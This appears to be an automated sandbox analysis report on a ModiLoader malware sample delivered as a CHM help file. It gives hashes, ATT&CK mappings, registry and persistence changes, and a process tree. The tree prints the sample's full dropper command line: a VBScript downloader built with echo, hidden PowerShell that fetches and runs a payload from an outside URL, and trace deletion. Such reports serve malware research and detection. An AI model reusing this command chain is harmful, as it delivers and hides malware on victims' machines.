modiloader | a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101

Analysis

max time kernel
121s
max time network
133s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
21-01-2025 03:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
Size

75KB
MD5

92588daadcf11b3311b82e8b20219340
SHA1

68c690da91c4a1cb0e7336b055ea87877a7b8b9d
SHA256

a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101
SHA512

38fa50cfad7f030712b9c8a81af995b0319075aa5e9ba3768d799bf13aa0532130d491bb6d90d0c8fbc2e8ffacc31e85629152d3281d4818eb8716d0f16cd523
SSDEEP

1536:PRReoi9mRqozQM8I3FInJQqcN8HSsIN2i5reqgdMb0OYqFHPf:5Rez9kTAoFI7jq2i6qgGbzYOn

Score

10^/10

modiloader defense_evasion discovery execution persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral1/memory/1172-63-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-66-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-75-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-68-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-96-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-74-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-98-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-110-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-108-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-106-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-105-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-103-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-102-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-99-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-95-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-94-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-92-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-90-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-87-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-86-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-85-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-84-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-101-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-73-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-139-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-133-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-82-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-123-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-119-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-115-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-111-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-109-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-89-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-72-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-143-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-83-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-132-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-70-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-124-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-122-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-80-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-69-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-114-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-107-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-77-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-100-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-93-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-145-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-67-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-140-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-135-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-130-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-125-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-118-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-79-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-78-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-104-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-76-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-91-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-88-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2
behavioral1/memory/1172-71-0x0000000002E20000-0x0000000003E20000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2964	powershell.exe
2940	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2688	ript.exe
1172	x.exe
2712	svchost.pif
2212	svchost.pif
904	xbnitqnH.pif

Loads dropped DLL 6 IoCs

pid	Process
2964	powershell.exe
2964	powershell.exe
2964	powershell.exe
2964	powershell.exe
1172	x.exe
1172	x.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hnqtinbx = "C:\\Users\\Public\\Hnqtinbx.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
3064	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
18	drive.google.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1172 set thread context of 904	1172	x.exe	49

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
2988	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Modifies system certificate store 2 TTPs 2 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ript.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1172	x.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2964	powershell.exe
2940	powershell.exe
2940	powershell.exe
2940	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	2988	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2904	hh.exe
2904	hh.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2904 wrote to memory of 3064	2904	hh.exe	30
PID 2904 wrote to memory of 3064	2904	hh.exe	30
PID 2904 wrote to memory of 3064	2904	hh.exe	30
PID 3064 wrote to memory of 2684	3064	cmd.exe	32
PID 3064 wrote to memory of 2684	3064	cmd.exe	32
PID 3064 wrote to memory of 2684	3064	cmd.exe	32
PID 3064 wrote to memory of 2964	3064	cmd.exe	33
PID 3064 wrote to memory of 2964	3064	cmd.exe	33
PID 3064 wrote to memory of 2964	3064	cmd.exe	33
PID 2964 wrote to memory of 2688	2964	powershell.exe	34
PID 2964 wrote to memory of 2688	2964	powershell.exe	34
PID 2964 wrote to memory of 2688	2964	powershell.exe	34
PID 3064 wrote to memory of 2940	3064	cmd.exe	36
PID 3064 wrote to memory of 2940	3064	cmd.exe	36
PID 3064 wrote to memory of 2940	3064	cmd.exe	36
PID 2940 wrote to memory of 3020	2940	powershell.exe	37
PID 2940 wrote to memory of 3020	2940	powershell.exe	37
PID 2940 wrote to memory of 3020	2940	powershell.exe	37
PID 3020 wrote to memory of 2372	3020	cmd.exe	39
PID 3020 wrote to memory of 2372	3020	cmd.exe	39
PID 3020 wrote to memory of 2372	3020	cmd.exe	39
PID 3064 wrote to memory of 2988	3064	cmd.exe	40
PID 3064 wrote to memory of 2988	3064	cmd.exe	40
PID 3064 wrote to memory of 2988	3064	cmd.exe	40
PID 3020 wrote to memory of 1172	3020	cmd.exe	41
PID 3020 wrote to memory of 1172	3020	cmd.exe	41
PID 3020 wrote to memory of 1172	3020	cmd.exe	41
PID 3020 wrote to memory of 1172	3020	cmd.exe	41
PID 1172 wrote to memory of 1016	1172	x.exe	43
PID 1172 wrote to memory of 1016	1172	x.exe	43
PID 1172 wrote to memory of 1016	1172	x.exe	43
PID 1172 wrote to memory of 1016	1172	x.exe	43
PID 1172 wrote to memory of 944	1172	x.exe	45
PID 1172 wrote to memory of 944	1172	x.exe	45
PID 1172 wrote to memory of 944	1172	x.exe	45
PID 1172 wrote to memory of 944	1172	x.exe	45
PID 1172 wrote to memory of 904	1172	x.exe	49
PID 1172 wrote to memory of 904	1172	x.exe	49
PID 1172 wrote to memory of 904	1172	x.exe	49
PID 1172 wrote to memory of 904	1172	x.exe	49
PID 1172 wrote to memory of 904	1172	x.exe	49
PID 1172 wrote to memory of 904	1172	x.exe	49

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:2684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:2688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2940
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3020
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:2372
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of WriteProcessMemory
        
        PID:1172
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Public\HnqtinbxF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1016
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:944
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        
        PID:2712
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        
        PID:2212
      - C:\Users\Public\Libraries\xbnitqnH.pif
        
        C:\Users\Public\Libraries\xbnitqnH.pif
        6⤵
        Executes dropped EXE
        
        PID:904
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
988KB

MD5
1d72e2b8a6cb15d3669376eadc4d4b09

SHA1
953c07f56947255c2974049349a3ac019c74f472

SHA256
6943783baf38adb80a064fb099a753de317015f0b660e3b4f3b1c201cfbdf3ac

SHA512
a476a17e7eb315b25ace3101ed5ad05964d3cbb14a9a212e1f2de030d2dc945d7d2f14b0b9df4e85db601b100d78e9e50fa189df348ad4c1548d41bdd1d7c883

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f069f06824a5638cfd71c8be2a1f1334

SHA1
a926e285d54d1e680da2e32eacd4ed650db3d660

SHA256
5332e1027491cc80db06519d2922b03553a34780d0ffbb071dc35822d0eb89ac

SHA512
28288f05727d36359cb704651d64ff105c3b84cd30374d5cc39f557b166b2b41a9464ddb6e605c39a840736e6ad09431618ddd9df8052b3941c92d00b37cbc9d

Download Submit
C:\Users\Public\HnqtinbxF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\df.cmd

Filesize
988KB

MD5
3353a1cc2a5dabca2e40faa9d5520cf4

SHA1
a98b8be630118989f3beceecc34fd524dae0f05c

SHA256
5c1f323caf7247e020dcfcd4cfc413afb6a19828fd4f9099c24f3635c62c8698

SHA512
fa4e3f1c4b7dfcc66c6c4d8fd2a91821d5a06bc9c282b03b15392e1bb6175d2679837a8d3143bf7b32ed252bacd8c295337a2fec11cefc3deda70a02215d4930

Download Submit
C:\Users\Public\ript.exe

Filesize
152KB

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
\Users\Public\Libraries\xbnitqnH.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
memory/1172-109-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-83-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-96-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-74-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-98-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-110-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-108-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-106-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-105-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-103-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-102-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-99-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-95-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-94-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-92-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-90-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-87-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-86-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-85-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-84-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-101-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-73-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-139-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-133-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-82-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-123-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-119-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-115-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-111-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-75-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-89-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-72-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-143-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-68-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-132-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-70-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
memory/1172-124-0x0000000002E20000-0x0000000003E20000-memory.dmp

Filesize
16.0MB

Download
